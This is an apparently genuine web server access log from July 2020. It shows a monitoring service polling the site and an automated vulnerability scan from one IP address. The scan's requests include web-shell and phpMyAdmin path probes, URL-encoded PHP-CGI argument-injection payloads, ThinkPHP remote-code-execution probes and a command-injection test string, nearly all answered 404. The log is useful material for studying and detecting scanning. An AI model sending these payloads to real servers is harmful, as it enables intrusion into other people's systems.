212.91.246.72 - - [05/Jul/2020:10:46:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.127.140.58 - - [05/Jul/2020:10:46:58 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:10:47:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:48:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:49:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:50:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:51:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.117 - - [05/Jul/2020:10:51:56 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:10:52:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:53:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:54:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:55:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.250.110.27 - - [05/Jul/2020:10:56:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:56:06 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:56:07 +0200] "POST /Admin55f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
212.91.246.72 - - [05/Jul/2020:10:56:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.250.110.27 - - [05/Jul/2020:10:56:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0"
216.250.110.27 - - [05/Jul/2020:10:56:29 +0200] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0"
216.250.110.27 - - [05/Jul/2020:10:56:29 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0"
216.250.110.27 - - [05/Jul/2020:10:56:29 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0"
216.250.110.27 - - [05/Jul/2020:10:56:29 +0200] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
216.250.110.27 - - [05/Jul/2020:10:56:51 +0200] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
216.250.110.27 - - [05/Jul/2020:10:57:13 +0200] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:10:57:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.250.110.27 - - [05/Jul/2020:10:57:35 +0200] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
216.250.110.27 - - [05/Jul/2020:10:57:56 +0200] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
216.250.110.27 - - [05/Jul/2020:10:58:18 +0200] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:10:58:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.250.110.27 - - [05/Jul/2020:10:58:40 +0200] "POST /forums/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
216.250.110.27 - - [05/Jul/2020:10:59:02 +0200] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:59:02 +0200] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:59:02 +0200] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:59:02 +0200] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:59:02 +0200] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
216.250.110.27 - - [05/Jul/2020:10:59:03 +0200] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
216.250.110.27 - - [05/Jul/2020:10:59:03 +0200] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
216.250.110.27 - - [05/Jul/2020:10:59:03 +0200] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:03 +0200] "GET /help.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:03 +0200] "GET /java.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:04 +0200] "GET /_query.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:04 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:04 +0200] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:04 +0200] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:04 +0200] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:05 +0200] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:05 +0200] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:05 +0200] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:05 +0200] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:05 +0200] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:06 +0200] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:06 +0200] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:06 +0200] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:06 +0200] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:06 +0200] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:07 +0200] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:07 +0200] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:07 +0200] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:07 +0200] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:07 +0200] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:08 +0200] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:09 +0200] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:09 +0200] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:09 +0200] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:09 +0200] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:09 +0200] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:10 +0200] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:10 +0200] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:10 +0200] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:10 +0200] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:10 +0200] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:11 +0200] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:11 +0200] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:11 +0200] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:11 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:11 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:12 +0200] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:12 +0200] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:12 +0200] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:12 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:12 +0200] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:13 +0200] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:14 +0200] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:14 +0200] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:14 +0200] "GET /weathermap/editor.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:14 +0200] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:14 +0200] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:15 +0200] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:15 +0200] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:15 +0200] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:15 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:16 +0200] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:16 +0200] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:16 +0200] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:16 +0200] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:16 +0200] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:17 +0200] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:17 +0200] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:17 +0200] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:17 +0200] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:17 +0200] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:18 +0200] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:18 +0200] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:18 +0200] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:18 +0200] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:18 +0200] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /new_license.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /images/!.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:19 +0200] "GET /images/vuln.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:20 +0200] "GET /hd.php HTTP/1.1" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:20 +0200] "GET /images/up.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.250.110.27 - - [05/Jul/2020:10:59:20 +0200] "GET /images/attari.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
